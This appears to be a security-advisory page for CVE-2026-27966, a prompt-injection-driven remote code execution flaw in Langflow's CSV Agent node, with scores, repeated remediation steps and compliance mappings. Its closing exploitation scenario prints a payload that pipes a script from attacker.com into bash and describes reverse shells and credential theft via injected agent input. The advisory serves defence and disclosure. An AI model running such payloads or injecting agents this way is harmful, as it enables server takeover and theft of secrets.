CVE-2026-27966 — CRITICAL (CVSS 9.8) AI Security Vulnerability

Q: Is CVE-2026-27966 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-27966, increasing the risk of exploitation.

Q: How to fix CVE-2026-27966?

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

Q: What systems are affected by CVE-2026-27966?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM workflow automation platforms, CSV and document processing pipelines, RAG pipelines, Multi-agent orchestration systems, MLOps and AI development environments.

Q: What is the CVSS score for CVE-2026-27966?

CVE-2026-27966 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 36.58%.

CISO Take

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

Risk Assessment

Severity is as high as it gets for AI framework vulnerabilities. The attack requires only network access and the ability to send input to the CSV Agent—no authentication, no complex exploitation chain. The hardcoded `allow_dangerous_code=True` flag is a design-level failure that permanently exposes the Python REPL to any user input that reaches the agent. AI/ML environments running Langflow are particularly high-risk because they often process untrusted external data (documents, CSVs from users) directly through agents, and the servers typically have broad cloud permissions and access to internal APIs, model inference endpoints, and datastores. Exposure is likely widespread given Langflow's popularity in enterprise AI workflow automation.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
langflow	pip	—	No patch
147.6K Pushed 6d ago 38% patched ~53d to patch Full package profile →
langflow	pip	<= 1.8.0rc2	No patch
147.6K Pushed 6d ago 38% patched ~53d to patch Full package profile →

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

36.6%

chance of exploitation in 30 days

Higher than 97% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

○ EPSS exploit prediction: 37%

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

1 step

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Prompt Injection Code Execution Framework RAG Agent AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051 - LLM Prompt Injection AML.T0051.000 - Direct AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0054 - LLM Jailbreak AML.T0055 - Unsecured Credentials AML.T0072 - Reverse Shell AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration AML.T0105 - Escape to Host

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, Robustness and Cybersecurity Art.15 - Accuracy, Robustness and Cybersecurity Art.9 - Risk Management System

ISO 42001

6.1.2 - AI Risk Assessment 8.4 - AI System Risk Management 8.7 - AI System Security

NIST AI RMF

GOVERN 1.2 - Accountability and Policies for AI Risk GOVERN-1.7 - Processes for identifying and managing AI risks MANAGE 2.2 - Mechanisms to Respond to and Recover from AI Risks MANAGE-2.4 - Risks and benefits of the AI system are communicated

OWASP LLM Top 10

LLM01 - Prompt Injection LLM01:2025 - Prompt Injection LLM02:2025 - Insecure Output Handling LLM07 - Insecure Plugin Design LLM08 - Excessive Agency LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-27966?

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

Is CVE-2026-27966 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-27966, increasing the risk of exploitation.

How to fix CVE-2026-27966?

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

What systems are affected by CVE-2026-27966?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM workflow automation platforms, CSV and document processing pipelines, RAG pipelines, Multi-agent orchestration systems, MLOps and AI development environments.

What is the CVSS score for CVE-2026-27966?

CVE-2026-27966 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 36.58%.

Technical Details

NVD Description

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.8.0, the CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE). Version 1.8.0 fixes the issue.

Exploitation Scenario

An adversary identifies a publicly accessible Langflow instance (e.g., via Shodan, exposed corporate AI portal, or leaked URL). They craft a malicious CSV file or direct prompt input to the CSV Agent node that injects a Python payload—e.g., `__import__('os').system('curl attacker.com/shell.sh | bash')`. Because `allow_dangerous_code=True` is hardcoded, the LangChain Python REPL executes the payload without restriction. The attacker establishes a reverse shell on the Langflow server, extracts environment variables containing OpenAI/Anthropic API keys, database connection strings, and AWS IAM credentials. They then pivot to the organization's vector database, exfiltrate the RAG corpus containing proprietary documents, and use the harvested cloud credentials to access S3 buckets or model registries. The entire attack chain requires zero authentication and can be automated.